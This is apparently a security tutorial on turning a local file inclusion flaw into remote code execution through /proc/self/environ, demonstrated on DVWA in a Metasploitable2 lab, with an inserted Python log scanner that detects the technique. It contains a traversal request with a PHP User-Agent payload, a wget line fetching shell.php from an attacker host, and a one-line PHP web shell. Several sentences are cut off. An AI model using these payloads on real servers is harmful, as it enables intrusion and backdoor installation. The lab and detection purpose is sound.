In this post we are going to see how an attacker can exploit an LFI vulnerability to achieve code execution by the use of
What is /proc/self/environ LFI Method ?
On Linux-based systems the environment variables of the current process (self) can be read via /proc/self/environ. When the request is handled by Apache, one of the environment variables set for the process is the User-Agent, which is fully controlled by the client through the HTTP request. If the /proc/self/environ file can be included through the LFI, RCE can be achieved by requesting that file in combination with a PHP payload placed in the HTTP User-Agent header.
GET lfi.php?file=../../../proc/self/environ HTTP/1.1
User-Agent: <?php phpinfo();?>
Now if an attacker sends the above HTTP request to the web server, then:
- First, the data in the User-Agent field will be written to the
- Then the page request lfi.php?file=../../../proc/self/environ will include the content of the /proc/self/environ file in the output page, and our payload gets executed.
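As an added example (not part of the original post), the following Python script shows how a defender can spot both halves of this technique in an Apache access log: a request whose target resolves to /proc/self/environ once URL-encoding (including double encoding) is stripped, and a PHP open tag in the User-Agent or Referer header. The log lines, IP addresses and paths are constructed for the demo.

```python
import re
from urllib.parse import unquote

# Constructed Apache "combined" access-log lines for this demo (not from the original post).
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /dvwa/vulnerabilities/fi/?page=../../../../proc/self/environ HTTP/1.1" 200 4521 "-" "<?php phpinfo();?>"
10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /dvwa/vulnerabilities/fi/?page=..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 4600 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:13:57:10 +0000] "GET /dvwa/vulnerabilities/fi/?page=include.php HTTP/1.1" 200 1203 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.9 - - [10/Oct/2023:13:58:22 +0000] "GET /index.php HTTP/1.1" 200 2209 "-" "<?= phpinfo(); ?>"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ENVIRON_RE = re.compile(r'proc/self/environ', re.IGNORECASE)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)

def decode_fully(value, rounds=3):
    """URL-decode repeatedly so double-encoded traversal (%252F) is still caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value

def classify(line):
    """Return (ip, target, indicators) for a suspicious line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    indicators = []
    if ENVIRON_RE.search(decode_fully(m.group('target'))):
        indicators.append('environ_include')
    if PHP_TAG_RE.search(m.group('ua')) or PHP_TAG_RE.search(m.group('referer')):
        indicators.append('php_in_header')
    if len(indicators) == 2:  # include of environ plus PHP tag in a header: likely RCE attempt
        indicators = ['environ_rce_attempt']
    return (m.group('ip'), m.group('target'), indicators) if indicators else None

def scan(log_text):
    """Collect every flagged request from an access log."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == '__main__':
    for ip, target, found in scan(SAMPLE_LOG):
        print(ip, target, ', '.join(found))
```

A single request carrying both indicators is the strongest signal; the environ include alone usually means the attacker is still probing, so it is worth alerting on as well.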
In this way a local file inclusion vulnerability can be leveraged into remote code execution. Now let's see an example of it. For the demonstration I am going to use the Metasploitable2 VM with DVWA; you can download Metasploitable2.
In the DVWA web application, we are going to use the File Inclusion page with the low security setting.
Now there is an LFI vulnerability in
Now let's try to include
And it gets included in the output page, which means it is also vulnerable to the /proc/self/environ attack. Now we just have to modify the User-Agent header of the request, which can be done with any browser proxy such as Burp Suite or ZAP proxy, or with the Tamper Data plugin for Firefox. I am going to use Burp proxy.
Now, first we are going to check whether our injected code executes or not; for this the payload will be:
And our request body will be :
Response output :
And it works, meaning we successfully executed our code on the web server. Now we are going to use the payload below:
<?php shell_exec('wget http://192.168.56.1:8000/shell.php -O /var/www/shell.php');?>
The above PHP code downloads the backdoor file shell.php and stores it in the web root directory (/var/www/). Here I am using a simple Python HTTP server to host the backdoor file; in a real-world scenario any web server can be used to host it. The code for the PHP backdoor shell.php is:
<?php $cmd = $_GET['cmd']; system($cmd); ?>
Now let's try the above payload.
Now let's try to access our backdoor.
And it works. If the User-Agent field is filtered by the web application, you can also inject PHP code within